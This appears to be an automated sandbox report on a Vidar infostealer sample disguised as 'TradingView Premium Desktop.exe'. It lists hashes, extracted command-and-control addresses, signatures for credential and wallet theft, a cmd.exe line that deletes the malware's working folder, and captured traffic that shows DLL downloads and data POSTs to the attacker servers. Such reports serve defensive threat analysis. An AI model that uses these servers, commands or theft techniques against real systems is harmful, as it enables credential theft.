Analysis
max time kernel: 90s
max time network: 130s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/10/2024, 02:20 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: TradingView Premium Desktop.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: TradingView Premium Desktop.exe
  Resource: win10v2004-20240802-en
General
Target: TradingView Premium Desktop.exe
Size: 782.1MB
MD5: a44c11ff27b4350c9e4d368cd6ae4583
SHA1: 9f5de149596e55a9b3560f3e162ce29d18c87f30
SHA256: 311c992c91b94c32e6bdb543da6944a2c3c4ee45305416f2d5d9c4a96eb05099
SHA512: 4cf4e9fbb39f24a1eabcbfe3e07cbfff568a62b27cb7587dd6bb466270b2c4d5673fb6ecaeb277bdf5d639e361bd33e396c1bab1c97e569e1d9c7180cc193f28
SSDEEP: 98304:NCVtEz6jrCmBJ9jQeXGuzTdodTqVcfK6mkzfV9F2QNL4AXAtVo7:Ncw1y3zZoJK6mEdD2DAQE7
Malware Config
Extracted: vidar
11
dd3c663b33910bd77937a09a739dc3d6
https://steamcommunity.com/profiles/76561199780418869
https://t.me/ae5ed
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Signatures
Detect Vidar Stealer (3 IoCs)
  resource                                                                     yara_rule
  behavioral2/memory/4420-7-0x0000000000840000-0x000000000134F000-memory.dmp   family_vidar_v7
  behavioral2/memory/4420-70-0x0000000000840000-0x000000000134F000-memory.dmp  family_vidar_v7
  behavioral2/memory/4420-71-0x0000000000840000-0x000000000134F000-memory.dmp  family_vidar_v7
Downloads MZ/PE file
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                Process
  Key value queried  \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation  TradingView Premium Desktop.exe
Loads dropped DLL (2 IoCs)
  pid   Process
  4420  TradingView Premium Desktop.exe
  4420  TradingView Premium Desktop.exe
Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Unsecured Credentials: Credentials In Files (1 TTPs)
Steal credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                        Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  TradingView Premium Desktop.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  timeout.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                              Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                  TradingView Premium Desktop.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  TradingView Premium Desktop.exe
Delays execution with timeout.exe (1 IoC)
  pid   Process
  4496  timeout.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid   Process
  4420  TradingView Premium Desktop.exe (8 events)
Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid   Process                          procid_target
  PID 4420 wrote to memory of 404  4420  TradingView Premium Desktop.exe  91
  PID 4420 wrote to memory of 404  4420  TradingView Premium Desktop.exe  91
  PID 4420 wrote to memory of 404  4420  TradingView Premium Desktop.exe  91
  PID 404 wrote to memory of 4496  404   cmd.exe                          93
  PID 404 wrote to memory of 4496  404   cmd.exe                          93
  PID 404 wrote to memory of 4496  404   cmd.exe                          93
Processes
C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\TradingView Premium Desktop.exe"
  PID: 4420
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBGIJEHIIDGC" & exit
    PID: 404
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\timeout.exe
      Command line: timeout /t 10
      PID: 4496
      - System Location Discovery: System Language Discovery
      - Delays execution with timeout.exe
Network
-
Remote address: 8.8.8.8:53
Request: 8.8.8.8.in-addr.arpa IN PTR
Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
-
Remote address: 8.8.8.8:53
Request: 196.249.167.52.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 0.205.248.87.in-addr.arpa IN PTR
Response: 0.205.248.87.in-addr.arpa IN PTR https-87-248-205-0.lgw.llnw.net
-
Remote address: 8.8.8.8:53
Request: 0.205.248.87.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 0.205.248.87.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 76.32.126.40.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 76.32.126.40.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 76.32.126.40.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: 95.221.229.192.in-addr.arpa IN PTR
-
Remote address: 8.8.8.8:53
Request: steamcommunity.com IN A
Response: steamcommunity.com IN A 104.82.234.109
-
Remote address: 104.82.234.109:443
Request:
GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Sat, 05 Oct 2024 02:21:49 GMT
Content-Length: 34935
Connection: keep-alive
Set-Cookie: sessionid=b7da2e7fb2668108cd9e8f94; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
-
Remote address: 8.8.8.8:53
Request: 109.234.82.104.in-addr.arpa IN PTR
Response: 109.234.82.104.in-addr.arpa IN PTR a104-82-234-109.deploy.static.akamaitechnologies.com
-
Remote address: 49.12.197.9:443
Request:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: 9.197.12.49.in-addr.arpa IN PTR
Response: 9.197.12.49.in-addr.arpa IN PTR static.9.197.12.49.clients.your-server.de
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIDAECGDAFBAAAAAECGI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 4601
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:55 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:55 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
GET /vcruntime140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 80880
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:56 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Saturday, 05-Oct-2024 02:21:56 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFIDAFBFBKFHJJKEHIEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDHCGDGIEBKJKFHJJKFC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 117969
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:21:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 49.12.197.9:443
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 02:22:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: cowod.hopto.org IN A
Response: cowod.hopto.org IN A 45.132.206.251
-
Remote address: 45.132.206.251:80
Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: cowod.hopto.org
Content-Length: 1973
Connection: Keep-Alive
Cache-Control: no-cache
-
Remote address: 8.8.8.8:53
Request: 251.206.132.45.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 209.205.72.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 53.210.109.20.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 18.31.95.13.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 172.214.232.199.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 172.210.232.199.in-addr.arpa IN PTR
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 48.229.111.52.in-addr.arpa IN PTR
Response: (empty)
-
Flow summary (sent, received, packets out, packets in, request, response)
104.82.234.109:443  https://steamcommunity.com/profiles/76561199780418869  tls, http  TradingView Premium Desktop.exe
  2.2kB    42.5kB   39    37    GET https://steamcommunity.com/profiles/76561199780418869  200
  958 B    2.7kB    11    8     GET https://49.12.197.9/  200
  1.4kB    622 B    9     6     POST https://49.12.197.9/  200
  1.5kB    2.2kB    10    7     POST https://49.12.197.9/  200
  1.6kB    6.4kB    13    10    POST https://49.12.197.9/  200
  1.4kB    672 B    9     6     POST https://49.12.197.9/  200
  5.9kB    565 B    13    6     POST https://49.12.197.9/  200
  92.5kB   2.5MB    1836  1831  (no HTTP request listed)
  1.5kB    565 B    9     6     POST https://49.12.197.9/  200
  1.5kB    565 B    9     6     POST https://49.12.197.9/  200
  24.4kB   707.6kB  517   514   GET https://49.12.197.9/freebl3.dll  200
  21.7kB   627.8kB  458   455   GET https://49.12.197.9/mozglue.dll  200
  16.3kB   464.7kB  341   338   GET https://49.12.197.9/msvcp140.dll  200
  9.8kB    266.6kB  199   196   GET https://49.12.197.9/softokn3.dll  200
  3.7kB    84.0kB   68    65    GET https://49.12.197.9/vcruntime140.dll  200
  71.3kB   2.1MB    1534  1531  GET https://49.12.197.9/nss3.dll  200
  1.5kB    2.8kB    10    7     POST https://49.12.197.9/  200
  1.4kB    748 B    9     6     POST https://49.12.197.9/  200
  122.8kB  2.2kB    97    48    POST https://49.12.197.9/  200
  1.4kB    518 B    8     5     POST https://49.12.197.9/  200
  1.4kB    518 B    8     5     (no HTTP request listed)
  2.5kB    132 B    6     3     POST http://cowod.hopto.org/  (no response)

DNS summary (sent, received, packets out, packets in, request, response)
  66 B   90 B   1  1  8.8.8.8.in-addr.arpa
  73 B   147 B  1  1  196.249.167.52.in-addr.arpa
  213 B  116 B  3  1  0.205.248.87.in-addr.arpa (3 requests)
  213 B  157 B  3  1  76.32.126.40.in-addr.arpa (3 requests)
  219 B  144 B  3  1  95.221.229.192.in-addr.arpa (3 requests)
  64 B   80 B   1  1  steamcommunity.com  104.82.234.109
  73 B   139 B  1  1  109.234.82.104.in-addr.arpa
  70 B   125 B  1  1  9.197.12.49.in-addr.arpa
  61 B   77 B   1  1  cowod.hopto.org  45.132.206.251
  73 B   134 B  1  1  251.206.132.45.in-addr.arpa
  72 B   158 B  1  1  209.205.72.20.in-addr.arpa
  70 B   144 B  1  1  18.31.95.13.in-addr.arpa
  72 B   158 B  1  1  53.210.109.20.in-addr.arpa
  74 B   128 B  1  1  172.214.232.199.in-addr.arpa
  74 B   128 B  1  1  172.210.232.199.in-addr.arpa
  72 B   158 B  1  1  48.229.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (4)
    Credentials In Files (4)
Downloads
Filesize: 593KB
MD5: c8fd9be83bc728cc04beffafc2907fe9
SHA1: 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256: ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512: fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize: 2.0MB
MD5: 1cc453cdf74f31e4d913ff9c10acdde2
SHA1: 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256: ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512: dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571